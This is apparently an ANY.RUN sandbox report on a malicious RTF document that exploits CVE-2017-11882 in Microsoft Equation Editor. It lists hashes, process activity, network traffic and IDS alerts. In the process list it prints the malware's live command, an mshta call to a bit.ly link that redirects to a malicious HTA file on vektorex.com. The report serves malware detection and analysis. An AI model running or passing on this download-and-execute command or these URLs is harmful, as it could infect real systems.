analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Signed Documents .doc

Full analysis: https://app.any.run/tasks/b45d4b09-5139-4062-8593-3fed19af1b0d
Verdict: Malicious activity
Analysis date: January 18, 2019, 08:33:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

492AABCDFBE3DDAC389B7B02B95643FC

SHA1:

D4CE96EBA78AC8E1FEF6E9C3DB6E8EDF247ABAFD

SHA256:

89FE5389B465EAB3C16A92166BCAB9D70531B8464C618DE9743F1075524839EC

SSDEEP:

1536:IV4l+lyxKalriYC8tGxdHoP13Gm+xaA2F+gvhkbXLjcuMs/LzV:I+l8kKwriYC8o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3336)
  • SUSPICIOUS

    • Starts Internet Explorer

      • rundll32.exe (PID: 3644)
    • Creates files in the user directory

      • mshta.exe (PID: 4028)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2820)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3336)
  • INFO

    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 2952)
    • Application launched itself

      • iexplore.exe (PID: 2948)
    • Creates files in the user directory

      • iexplore.exe (PID: 3052)
      • WINWORD.EXE (PID: 2820)
    • Reads internet explorer settings

      • mshta.exe (PID: 4028)
      • iexplore.exe (PID: 3052)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2820)
    • Changes internet zones settings

      • iexplore.exe (PID: 2948)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3336)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3052)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

LastModifiedBy: -
Author: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe explorer.exe no specs rundll32.exe no specs rundll32.exe no specs notepad.exe no specs iexplore.exe iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2820"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Signed Documents .doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3336"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
4028mshta http://bit.ly/2MfnxL8 &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1140"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3644"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2952"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3512"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datC:\Windows\system32\NOTEPAD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2948"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3052"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2948 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
2 353
Read events
1 574
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
23
Unknown types
3

Dropped files

PID
Process
Filename
Type
2820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8D42.tmp.cvr
MD5:
SHA256:
2948iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2948iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3052iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@bing[2].txt
MD5:
SHA256:
3052iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\search[1].txt
MD5:
SHA256:
2948iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico
MD5:
SHA256:
4028mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:844A60FA56CA55E42CB6E2CC65DD995E
SHA256:389CBC3378532EE78AF4BCAAC88BB71284A589AEDCD0C0F3CF4E0397F2B73680
3052iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@bing[1].txttext
MD5:91C392D6A1D795FC2D7DC8F18E7E080B
SHA256:2F256C9EA9E9344053122B07B0D34E6EC46D412ADE2C9982E577F29222A22339
3052iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\search[1].htmhtml
MD5:3F821C3FC01BA39C67CAA521ADFC53B8
SHA256:432B06912C029C45494FB185F1A502822AEFB8C3FADD2609467013BB2D4C03CD
3052iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\9a358300[1].jstext
MD5:26D5C5DD7C280FA90F88A152BB557441
SHA256:63BF2C3D1A4B69EC7D9681BEF931C76713DA9C94CC5C1CF9D9F8B142917C9362
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
12
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3052
iexplore.exe
GET
301
2.16.186.24:80
http://shell.windows.com/fileassoc/fileassoc.asp?Ext=dat
unknown
whitelisted
3052
iexplore.exe
GET
302
23.51.118.23:80
http://go.microsoft.com/fwlink/?LinkId=57426&Ext=dat
NL
whitelisted
4028
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/2MfnxL8
US
html
129 b
shared
4028
mshta.exe
GET
404
94.73.146.167:80
http://vektorex.com/cgii/kass934Report.hta
TR
html
657 b
malicious
2948
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4028
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
2948
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3052
iexplore.exe
2.16.186.24:80
shell.windows.com
Akamai International B.V.
whitelisted
2948
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
3052
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
4028
mshta.exe
94.73.146.167:80
vektorex.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
3052
iexplore.exe
23.51.118.23:80
go.microsoft.com
Akamai Technologies, Inc.
NL
whitelisted

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
vektorex.com
  • 94.73.146.167
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
go.microsoft.com
  • 23.51.118.23
whitelisted
shell.windows.com
  • 2.16.186.24
  • 2.16.186.27
whitelisted

Threats

PID
Process
Class
Message
4028
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
4028
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
4028
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
4028
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
4028
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object
4028
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object
No debug info